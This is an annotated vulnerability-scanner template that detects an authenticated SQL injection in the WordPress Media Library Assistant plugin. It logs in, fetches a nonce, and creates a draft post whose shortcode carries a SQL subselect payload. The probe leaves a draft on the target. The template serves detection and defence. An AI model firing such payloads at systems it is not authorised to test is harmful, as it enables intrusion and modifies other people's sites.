# Authenticated detection template for a SQL injection in the WordPress
# "Media Library Assistant" plugin (<= 3.34, per info.name).
# It runs four chained HTTP steps: plugin presence check, login, REST nonce
# fetch, and a draft-post probe whose rendered shortcode output shows whether
# attacker-supplied SQL in the `fields` attribute was evaluated.
id: CVE-2026-34885

info:
  name: WordPress Media Library Assistant <= 3.34 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    David Lingren Media Library Assistant <= 3.34 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  # NOTE(review): the first fixed release is not named anywhere in this
  # template; confirm it against the vendor changelog before acting on it.
  remediation: |
    Update to the latest version beyond 3.34.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability
    - https://plugins.svn.wordpress.org/media-library-assistant/tags/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34885
  classification:
    # PR:L in the vector matches the `authenticated` tag: the probe only works
    # with a logged-in account (see the login step below).
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 8.5
    cve-id: CVE-2026-34885
    epss-score: 0.08063
    epss-percentile: 0.92346
    cwe-id: CWE-89
  metadata:
    # NOTE(review): four request blocks are defined under `http:`; confirm
    # whether this count is stale.
    max-request: 5
    verified: true
    shodan-query: http.html:"/wp-content/plugins/media-library-assistant/"
    fofa-query: body="/wp-content/plugins/media-library-assistant/"
  tags: cve,cve2026,wp,wordpress,wp-plugin,sqli,media-library-assistant,authenticated

variables:
  # Constant fed to MD5() inside the injected subselect; the final matcher
  # looks for md5(num) in the response. Quoted so it stays a string.
  num: "999999999"

# Each step runs only if the previous one matched, so no login attempt or
# write is made against hosts that do not expose the plugin's readme.
flow: http(1) && http(2) && http(3) && http(4)

http:
  # Step 1: plugin presence check. Both words must appear in readme.txt.
  # No version comparison is done here; vulnerability is decided in step 4.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt"

    matchers:
      - type: word
        words:
          - "Media Library Assistant"
          - "Stable tag:"
        condition: and
        # internal: gates the flow without being reported as a finding.
        internal: true

  # Step 2: log in with operator-supplied {{username}} / {{password}}.
  # Success is inferred from "wordpress_logged_in" appearing in the response
  # headers. Step 4 creates a post through the REST API, so the account
  # presumably needs a role that may create posts - TODO confirm minimum role.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  # Step 3: fetch a REST nonce for the logged-in session. The whole body must
  # be exactly ten lowercase hex characters; it is stored as `nonce` and sent
  # as X-WP-Nonce in step 4.
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 0
        regex:
          - "^[a-f0-9]{10}$"
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        condition: and
        internal: true

  # Step 4: the probe. Creates a DRAFT post whose content is an
  # [mla_custom_list] shortcode with a SQL subselect in its `fields`
  # attribute. The subselect only computes a constant:
  # CONCAT(0x7170787871, md5(num), 0x7171787171), i.e. "qpxxq" + md5 + "qqxqq";
  # it reads no table data.
  #
  # Side effect: the template never deletes the draft, so every run that
  # reaches this step leaves a randomly titled draft post on the target.
  # Remove these after a scan.
  #
  # Detection: the observable in request logs or a WAF is a POST to
  # /wp-json/wp/v2/posts whose content carries an mla_custom_list shortcode
  # with SQL keywords inside `fields`.
  - raw:
      - |
        POST /wp-json/wp/v2/posts HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-WP-Nonce: {{nonce}}

        {"title":"{{rand_text_alpha(10)}}","content":"[mla_custom_list meta_key=\"_wp_attached_file\" fields=\"(SELECT CONCAT(0x7170787871,md5({{num}}),0x7171787171)) AS meta_value\" no_count=\"true\"]","status":"draft"}

    # The only non-internal matcher, so this is what reports the finding.
    # It requires 201 Created plus the computed MD5 of `num` in the body; the
    # request sends only the text "md5(999999999)", so the hash appearing
    # means the database evaluated the expression.
    # NOTE(review): the "qpxxq"/"qqxqq" delimiters from the payload are not
    # checked here; matching them too would be stricter - confirm that the
    # rendered output keeps them adjacent to the hash.
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains_all(body, "{{md5(num)}}", "content", "rendered")'
        condition: and
# NOTE(review): the digest below was issued for the template text as
# published. Any edit, including re-indentation or added comments, presumably
# invalidates it; re-sign the file before relying on signature verification.
# digest: 4a0a0047304502210087df305664c626e631320a6e695de8aa00602b15bbd9f872c67abf74ae569ed5022020878fdd0e86466aa02896b27316bc399fbf26175f2e194979763290bc03a52f:922c64590222798bb761d5b6d8e72950